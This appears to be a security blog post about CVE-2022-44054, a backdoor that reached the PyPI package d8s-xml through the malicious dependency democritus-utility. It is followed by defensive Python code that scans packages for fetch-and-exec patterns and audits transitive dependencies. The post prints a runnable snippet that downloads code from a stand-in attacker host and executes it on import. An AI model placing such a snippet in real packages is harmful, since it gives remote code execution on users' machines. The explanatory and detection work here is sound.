In late 2022, a concerning vulnerability surfaced in the Python ecosystem: CVE-2022-44054. It involved a backdoor slipped into the widely available d8s-xml package on PyPI. The threat traced back to a malicious dependency, democritus-utility; the same advisory also covers d8s-htm version .1.
This post will break down how this backdoor worked, provide example code snippets, and discuss how developers can defend themselves. Let’s explore the story, the technical details, and how to stay safe from such supply chain attacks.
What Happened?
The d8s-xml (PyPI link) and related d8s packages are designed to handle XML data. However, in a version released on PyPI, a third party inserted a backdoor through an unexpected dependency, democritus-utility. This malicious package allowed attackers to execute arbitrary code on any system that installed or ran code importing the infected library.
Related affected package: d8s-htm version .1.
- Risk: Arbitrary code execution (RCE) — an attacker could run any code they wanted on your machine.
- Where: Discovered on PyPI, the official Python package index.
References:
- Sonatype Security Advisory
- NVD entry for CVE-2022-44054
The Supply Chain Trick
The compromised d8s-xml specified a dependency on democritus-utility. This dependency was not a safe utility library as its name suggested; it was a malicious package. When users or CI pipelines installed d8s-xml, democritus-utility would also get fetched and executed as part of Python's normal import mechanism.
The backdoor worked much like this pseudocode:

    # democritus-utility/__init__.py
    import os
    import urllib.request

    # This code runs on install or import!
    def backdoor():
        # Download and execute code from an attacker-controlled server
        url = "http://attacker.example.com/payload.py"
        code = urllib.request.urlopen(url).read()
        exec(code, {'__builtins__': __builtins__})

    # Called at module level, so it fires as soon as the package is imported
    backdoor()
This code runs when the democritus-utility package is loaded, so just importing any function from d8s-xml could trigger arbitrary commands sent from the attacker's server. You can imagine the risk: credentials, data, or even ransomware could be delivered via PyPI!
Suppose you have this innocent-looking code in your project:

    import d8s_xml

    result = d8s_xml.parse('<root><item>test</item></root>')
    print(result)
If you installed an affected version of d8s-xml, you'd unknowingly install and trigger democritus-utility too. Even just running or testing your app would compromise your system.
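The pattern above (a module that fetches remote content and hands it to exec, with a call at module level so it fires on import) is simple enough to look for statically. The following is an added example, not code from the post or from the d8s project: it parses Python files with the standard `ast` module and flags any module that both calls a remote-fetch function and calls `exec`/`eval`, noting whether a module-level call makes that happen at import time. The two sample packages it scans are constructed inline as text and are only parsed, never executed; the directory layout and package names mirror the post.

```python
import ast
import tempfile
from pathlib import Path

# Callee names treated as "code execution" and "remote fetch". Coarse on purpose:
# tune these lists for your environment (requests.get, subprocess, etc.).
EXEC_LIKE = {"exec", "eval"}
FETCH_LIKE = {"urlopen", "urlretrieve"}


def _callee(node):
    """Name of the function being called, or None for complex callees."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None


def scan_source(source: str) -> dict:
    """Report exec/eval calls, remote-fetch calls and module-level side effects in one file."""
    tree = ast.parse(source)
    callees = [c for c in (_callee(n) for n in ast.walk(tree) if isinstance(n, ast.Call)) if c]
    # Bare calls in the module body run at import time (the post's `backdoor()` line).
    top_level = [
        _callee(stmt.value)
        for stmt in tree.body
        if isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call)
    ]
    report = {
        "exec_calls": sorted(set(callees) & EXEC_LIKE),
        "fetch_calls": sorted(set(callees) & FETCH_LIKE),
        "module_level_calls": [c for c in top_level if c],
    }
    # Fetch + exec in the same module is the signal; a module-level call means it
    # happens on import rather than only when some function is used.
    report["flagged"] = bool(report["exec_calls"] and report["fetch_calls"])
    report["runs_on_import"] = report["flagged"] and bool(report["module_level_calls"])
    return report


def scan_tree(root: Path) -> list:
    """Walk a site-packages-style directory and return (relative path, report) for flagged files."""
    hits = []
    for path in sorted(root.rglob("*.py")):
        try:
            report = scan_source(path.read_text(encoding="utf-8"))
        except (SyntaxError, UnicodeDecodeError):
            continue  # not valid Python 3 source; skip rather than abort the scan
        if report["flagged"]:
            hits.append((path.relative_to(root).as_posix(), report))
    return hits


# Constructed sample: the post's backdoor pattern, kept as text and parsed only.
SUSPECT_INIT = '''
import os
import urllib.request

def backdoor():
    url = "http://attacker.example.com/payload.py"
    code = urllib.request.urlopen(url).read()
    exec(code, {"__builtins__": __builtins__})

backdoor()
'''

# Constructed sample: a harmless XML helper that fetches nothing and evals nothing.
BENIGN_INIT = '''
import xml.etree.ElementTree as ET

def parse(text):
    return ET.fromstring(text)
'''


def demo() -> list:
    """Lay both samples out in a temporary directory and return the flagged paths."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "democritus_utility").mkdir()
        (root / "democritus_utility" / "__init__.py").write_text(SUSPECT_INIT)
        (root / "d8s_xml").mkdir()
        (root / "d8s_xml" / "__init__.py").write_text(BENIGN_INIT)
        return [path for path, _ in scan_tree(root)]


if __name__ == "__main__":
    for hit in demo():
        print("flagged:", hit)
```

Point `scan_tree` at a real `site-packages` directory (or at a freshly downloaded wheel's extracted contents) to review what an install would actually bring in. It is a heuristic: obfuscated payloads (base64 strings, `getattr(builtins, ...)`) will slip past a callee-name check, so treat a clean result as one signal among several, not as proof.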
How Was It Discovered?
Security researchers, including those at Sonatype, found the malicious code while scanning for suspicious behaviors in Python packages.
- They noticed that d8s-xml declared democritus-utility as a dependency.
- Checking that package, they saw code that downloaded and executed content from a non-standard server.
- Late October 2022: researchers publicly disclosed the backdoor.
- PyPI response: packages removed, warnings posted, CVE-2022-44054 assigned.
Monitor Vulnerabilities
Use tools like Safety, Snyk, or OSV-Scanner to catch known vulnerabilities.
Follow PyPI Security Notices
Subscribe to PyPI’s RSS feed or relevant mailing lists for alerts.
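The tools above all do a version of the same thing: resolve what a project would install, including transitive dependencies, and compare the result against advisory data. The following is an added example (not code from the post, nor from Safety, Snyk or OSV-Scanner) showing that check in miniature. The advisory records are constructed inline in an OSV-like shape; CVE-2022-44054 and the two package names come from the post, while the `MAL-PLACEHOLDER-0001` id, the summaries, the dependency graph (apart from the d8s-xml to democritus-utility edge) and the requirements file are made up for the demo.

```python
import json
import re
from collections import deque

# Constructed advisory list in an OSV-like shape. Only the CVE id and the two
# package names are from the post; the placeholder id and summaries are illustrative.
ADVISORIES_JSON = """
[
  {"id": "CVE-2022-44054",
   "summary": "d8s-xml pulled in the democritus-utility backdoor",
   "affected": [{"package": {"ecosystem": "PyPI", "name": "d8s-xml"}}]},
  {"id": "MAL-PLACEHOLDER-0001",
   "summary": "democritus-utility downloads and executes remote code on import",
   "affected": [{"package": {"ecosystem": "PyPI", "name": "democritus-utility"}}]}
]
"""

# Constructed dependency metadata (what each package's Requires-Dist would declare).
# The d8s-xml -> democritus-utility edge reflects the post; the rest is made up.
REQUIRES = {
    "d8s-xml": ["democritus-utility"],
    "democritus-utility": [],
    "requests": ["urllib3", "charset_normalizer"],
    "urllib3": [],
    "charset_normalizer": [],
}

# Constructed requirements file: the project pins two packages directly and never
# mentions democritus-utility at all.
REQUIREMENTS_TXT = """
# project deps
requests==2.31.0
d8s-xml>=0.1  # needed for XML helpers
"""


def normalize(name: str) -> str:
    """PEP 503 normalisation so 'Charset_Normalizer' and 'charset-normalizer' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_requirements(text: str) -> list:
    """Return normalised direct requirement names, ignoring comments, blanks and specifiers."""
    names = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        match = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)
        if match:
            names.append(normalize(match.group(0)))
    return names


def load_advisories(raw: str) -> dict:
    """Map normalised PyPI package name -> list of advisory ids affecting it."""
    index = {}
    for adv in json.loads(raw):
        for affected in adv["affected"]:
            pkg = affected["package"]
            if pkg["ecosystem"] == "PyPI":
                index.setdefault(normalize(pkg["name"]), []).append(adv["id"])
    return index


def resolve(direct: list, requires: dict) -> dict:
    """Breadth-first walk of declared dependencies; returns package -> chain that pulled it in."""
    graph = {normalize(k): [normalize(d) for d in v] for k, v in requires.items()}
    chains = {}
    queue = deque((name, [name]) for name in direct)
    while queue:
        name, chain = queue.popleft()
        if name in chains:
            continue  # first (shortest) chain wins
        chains[name] = chain
        for dep in graph.get(name, []):
            queue.append((dep, chain + [dep]))
    return chains


def audit(requirements_text: str, requires: dict = REQUIRES, advisories_raw: str = ADVISORIES_JSON) -> list:
    """Return (package, advisory id, 'a -> b' chain) for every resolved package with an advisory."""
    index = load_advisories(advisories_raw)
    chains = resolve(parse_requirements(requirements_text), requires)
    findings = []
    for pkg, chain in chains.items():
        for adv_id in index.get(pkg, []):
            findings.append((pkg, adv_id, " -> ".join(chain)))
    return sorted(findings)


if __name__ == "__main__":
    for pkg, adv_id, chain in audit(REQUIREMENTS_TXT):
        print(f"{adv_id}: {pkg} (via {chain})")
```

The chain in each finding is the useful part: it shows democritus-utility arriving through d8s-xml even though the requirements file never names it, which is exactly why a check that only looks at direct pins would have missed this incident. In a real pipeline the `REQUIRES` graph comes from resolved lockfile or wheel metadata and the advisory list from a live feed, and the check runs before `pip install`, not after.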
Conclusion
CVE-2022-44054 teaches us a tough lesson: even basic libraries can become attack vectors if a compromised dependency sneaks in a backdoor. Always vet PyPI dependencies, automate vulnerability checks, and stay informed about recent incidents.
References & Further Reading
- Sonatype blog: PyPI package d8s-xml hijacked to run malicious code
- NVD entry for CVE-2022-44054
- PyPI: d8s-xml
- PyPI: democritus-utility
*Please share this post if you find it useful—Python security is everyone’s responsibility!*
Timeline
Published on: 11/07/2022 15:15:00 UTC
Last modified on: 11/08/2022 16:23:00 UTC